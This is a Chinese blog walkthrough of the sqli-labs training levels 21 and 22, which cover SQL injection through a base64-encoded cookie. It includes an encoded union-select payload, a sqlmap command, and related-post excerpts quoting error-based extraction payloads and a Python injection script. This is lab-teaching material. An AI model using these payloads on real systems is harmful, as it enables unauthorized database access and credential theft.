sqli-labs第二十一二十二关

原创 已于 2023-02-17 13:02:14 修改 · 385 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #web安全 #网络安全 #安全

于 2023-02-17 13:01:50 首次发布
文章介绍了如何处理加密的Cookie注入问题,包括手动和自动化的解决方法。在Less-20关中,通过识别加密顺序(base64然后URL编码),尝试注入单引号并构造payload来绕过加密。对于自动化注入,使用sqlmap工具,调整参数以应对加密的Cookie值,进行数据库查询。

这两关还是cookie注入,但是cookie加密了。

Less-20(POST - Cookie Injection - base64 encoded quotes and parenthesis)

手工注入

和20关前面一样需要登入。

基础判断

很明显这里cookie加密了。我建议直接抓下包看看就可以。

我建议先直接吧加密信息直接放到burp的decoder模块直接跑一下看看。

这里我们发现他加密的顺序,先base64加密再进行url部分加密。接下来我们来解决一下闭合方式。

可以直接试试单引号(记得加密)

好因为cookie带单引号报错了,嘿嘿这就是单引号和括号闭合了。根据之前的知识构造一下payload。

查询数据库

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHNjaGVtYV9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhICM%3d

接下来需要基础的注入知识就可以了。

sqli-labs第一二关_himobrinehacken的博客-优快云博客

自动化脚本注入

这里我就简单说下不一样的地方

sqlmap.py -u http://192.168.221.131/sqli/Less-21/ --cookie="uname = YWRtaW4="*  --threads=10 --batch --tamper=base64encode --level=5 --dbs

注意这里由于我们没有经过游览器解码,游览器传输数据是要url加密的,所以这里只需要解决网站加密问题就可以。(比较慢我就没有放下图片了)

这里有sqlmap的参数

https://www.processon.com/view/link/63edc0ce260d710715545868

Less-20(POST - Cookie Injection - base64 encoded quotes and parenthesis)

手工注入

和上一关一样,只是闭合方式改变了。

Iik%3d

自动化脚本注入

和上一关一样哦。

Sqli-labs靶场第21、22详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1463
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 2048
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场通攻略 (二十一到三十
2301_81881972的博客
08-22 1834
')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码。')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码。
sqli-labs卡21(基于cookie被base64编码的报错盲注)通思路
zyh1588的博客
11-28 879
小白回顾sql靶场21
sqli-labs第二十一详解(这次用sqlmap)
金 帛的博客
05-09 3167
SQL靶场第二十一答案详解,这次用sqlmap跑
sqlilabs第二十一-第二十八a 详解
GN_QT的博客
08-03 378
和二十的区别是闭合不同,cookie里uname的值进行了base64加密,在使用cookie的时候会进行base64解密,注入代码进行base64加密,对cookie名为x的参数进行注入,后面加*意思是只对cookie对应的点进行注入测试,不加会判断其他参数是否为注入点。添加admin'#用户,利用修改密码,执行语句会把admin用户密码改了。可以通过判断字段数,回显位 ,查数据库,查表,查列,查字段。id=1' or '1'='1,成功。下面的就是,查看数据库名,表名,列名,数据值。
sqli-labs第二详解
m0_67391521的博客
05-15 640
目录 源码分析 setcookie函数分析 header函数分析 ?注入点查找 DNSlog注入 爆数据库 爆表 爆字段 爆值 源码分析 看了下源码,跟上一差别挺大的,先看下不懂的函数 setcookie函数分析 setcookie(),简单来说就是网站给了一个cookie你,下次访问的时候就能直接在http中带上这个cookie,保留上次访问的记录 而源码里第一个出现的setcookie的意思就是 给客户端发送一个名为uname的cookie,uname值设置为$cookee的值,360
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1235
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs第二十一和二十二(加密cookie注入)
qq_42266432的博客
08-31 550
进入到第21,登录admin,发现这还是cookie注入,只不过cookie和上一有点不同,被加密了,于是将YWRtaW4复制下来,找一个加解密工具解密,由于加密未设偏移量啥的,所以很轻松就能发现使用的是base64加密做到这里的话,思路和上一一样了 使用burp抓包,并将cookie后加个n 页面回显错误 寻找闭合,将cookie修改为YWRtaW4nKSM=,即base64加密后的admin’)#,结果如上图,闭合成功 YWRtaW4nKSBvcmRlciBieSA0Iw==为加密后的admi.
SQL注入:sqli-labs靶场通(第十五——第二
l258282的博客
12-14 1078
使用1 or 1=1 和 1 or 1=2发现页面正常。输入1’发现并没有报错,输入1"发现也没有报错。1'1"这次连闭合报错的信息都没有了,所以不能用报错注入了。这里可以用布尔盲注或时间盲注。
sql-labs靶场第二十一测试报告
ccc_9wy的博客
10-21 1573
sql-labs第二十一的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程;报错注入;sqlmap编码注入;cookie注入。
sqli-labs-master第21、22
m_ing
05-16 2097
前言:昨天我们研究了http头部cookie注入,反正我是让让抓包软件给搞死了,废了老半天劲!我们来研究下加密后的cookie 第21: 看到这个页面我们还是输入用户密码,返回了这个页面 提示了一系列的信息 我们还是抓包分析下 看到了加密后的cookie 我们查看源代码,看看是怎样的加密方式 是被base64加码算法加密了 我们找个解密软件或者相的程序 我们输入的用户就是admin所以解密正确 先构造语句验证是否存在注入,admin’经过base64编码后YWRtaW4n,带入测试发现报错
sqli-labs21基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 650
第21基于cookie报错注入 其实测试语句和20差不多,但是需要转码,转成base64再带入到cookie中,然后(base64在bp中有模块) 一、判断注入点 没转码之前 ' )and extractvalue(1,concat(0x7e,( 1),0x7e))# JyApYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLCggMSksMHg3ZSkpIyA= (这里的思想是先不用闭合点,进行转码,一点一点试出来,然后报错出1的话,就是闭合点) 二、爆库 ' )a
sqli靶场21-40
weixin_46976845的博客
03-30 4992
sql靶场练习
sqli-labs 21 - 30
weixin_44843084的博客
05-29 546
sqli-labs 21 - 30 less21 登陆后 cookie的uname值是base64加密 试了几次,格式是’) 依旧是3列 剩下的跟上题一样 less22 跟上一题一样,格式是" less23 又回到get了[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 闭合是’ 直接注释好像有什么问题(应该是被过滤了 语句可能是类似id=’$id’ limit 0,1?(好像真的是 这样是可以的 但是不能1' order by 4 and '1'='1(还是上图
sqli-labs————less 21
Fly_鹏程万里
05-12 1683
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该的代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
sqli-labs第21-28
永远相信美好的事情即将发生
02-11 1306
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
SqliLabs Less21-22
qq_45785324的博客
07-15 610
SqliLabs Less21 Less22
SQli-labs 进阶 21-38
感恩
09-15 494
SQLI-LAB less21~38
sqli-labs第十二怎么过
最新发布
05-01
<think>嗯,用户现在在问SQLi-Labs第十二的解法或提示。首先,我需要回忆一下第十二的特点。根据之前的经验,SQLi-Labs的每个卡通常涉及不同类型的SQL注入,比如GET或POST请求,不同的参数处理方式,或者特定的过滤和防护措施。用户之前可能已经完成了前面的卡,所以第十二可能比之前的更难,或者引入了新的挑战。 根据用户提供的引用内容,之前的卡如第四、第七涉及到联合查询注入和文件导出操作,比如使用`union select`结合`group_concat`获取表名,或者`into outfile`导出数据。第七还提到了文件操作的函数需要配置`secure_file_priv`。这些引用可能提示第十二可能涉及类似的注入技术,但可能有不同的参数处理方式,比如POST请求或不同的注入点类型。 首先,我需要确认第十二的具体设置。通常,第十二可能是一个POST类型的注入,比如基于报错的注入或者盲注。例如,可能是一个登录表单,用户需要利用注入绕过认证或提取数据。根据用户提供的引用,第七使用了文件导出,而第四是联合查询,但第十二可能有所不同。 然后,用户提供的引用中有于爆库名、表名的技术,如使用`extractvalue`函数进行报错注入,这可能在第十二中适用。比如,如果注入点存在报错回显,可以利用报错注入来获取信息。此外,联合查询注入需要确定列数,可能需要通过`order by`来测试。 另外,引用中提到了`into outfile`的使用,但第十二可能涉及到字符转义或闭合问题。例如,输入参数可能被包裹在特定的符号中,如双引号和括号,导致需要正确闭合才能执行注入。例如,如果参数处理是`"$id"`,那么注入时需要闭合双引号,并处理可能的括号。 接下来,考虑用户可能需要具体的步骤。比如,确定注入点类型(字符型还是数字型)、测试闭合方式、使用联合查询或报错注入。例如,如果输入被包裹在双引号和括号中,如`("$id")`,那么注入可能需要类似`")`来闭合,然后添加恶意代码。 同时,用户可能遇到的障碍包括如何正确闭合引号和括号,如何绕过过滤,或者如何确定可用的列数。例如,使用`") order by 3--+`来测试列数,然后进行联合查询,或者使用报错函数如`updatexml`或`extractvalue`来提取数据。 另外,需要注意是否有过滤函数,比如对`union select`或空格的处理,可能需要使用注释符或内联注释绕过。例如,使用`/**/`代替空格,或者使用`%a0`作为空格的替代。 根据引用[3]中的例子,报错注入使用了`extractvalue`函数,这可能适用于第十二。例如,构造如`" or extractvalue(1, concat(0x7e, (select database()))) --+`这样的注入语句,触发数据库错误并返回信息。 最后,用户可能需要导出文件,但需要确认`secure_file_priv`的设置是否允许写入,如引用[4]所述。但在第十二中,可能不需要文件导出,而是侧重于通过注入获取数据。 总结可能的步骤:1. 确定注入点类型和闭合方式;2. 测试列数;3. 使用联合查询或报错注入获取信息;4. 提取数据库名、表名、列名和数据。</think>根据SQLi-Labs第十二的POST型注入特点和常见解法,以下是分步解析: ### 第十二解题思路 #### 1. 确定注入类型 本为**POST请求**,参数使用双引号+括号包裹:`("$id")`。测试闭合方式时需使用`")`闭合原始语句[^4]。 #### 2. 构造闭合语句 尝试在用户名或密码输入框中注入: ```sql admin") or 1=1 --+ ``` 若成功绕过登录,说明闭合正确。 #### 3. 联合查询注入 **(1) 确定列数** ```sql admin") order by 3 --+ ``` 当`order by 4`报错时,说明共3列。 **(2) 获取回显位** ```sql admin") union select 1,2,3 --+ ``` 观察页面显示数字2和3的位置用于回显。 **(3) 提取数据库信息** ```sql admin") union select 1,database(),version() --+ ``` 回显当前数据库名和版本[^1]。 #### 4. 报错注入(备用方案) 若联合查询被过滤,使用`updatexml()`: ```sql admin") and updatexml(1,concat(0x7e,(select user())),1) --+ ``` 通过报错信息获取当前用户[^3]。 ```python # 示例请求代码(Python requests) import requests url = "http://localhost/sqli-labs/Less-12/" data = {"uname": 'admin") union select 1,@@version,3 --+', "passwd": "test"} response = requests.post(url, data=data) print(response.text) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值